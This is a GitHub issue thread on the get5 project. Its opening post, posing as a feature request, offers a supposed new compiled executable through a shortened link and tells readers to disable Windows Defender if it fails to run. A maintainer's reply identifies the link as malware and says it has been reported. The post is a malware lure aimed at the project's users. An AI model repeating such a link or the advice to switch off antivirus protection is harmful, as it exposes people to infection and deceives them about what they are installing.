### ISSUE TITLE
New compiled version

### ISSUE THREAD

**Issue by jrum9** [splewis/get5#1032]
### Prereleases & Documentation

- [X] I have looked in [the documentation](https://splewis.github.io/get5) and I don't see the feature anywhere.
- [X] I have looked for [pre-releases](https://github.com/splewis/get5/releases) and the feature has not been added.

### Get5 Version

6

### The Feature

I uploaded a new exe version here: (Try disabling Windows Defender if it does not work)
shorturl.at/ehOR2

**Comment by nickdnk** [comment]
This is malware and has been reported to GitHub. Do no click the link.
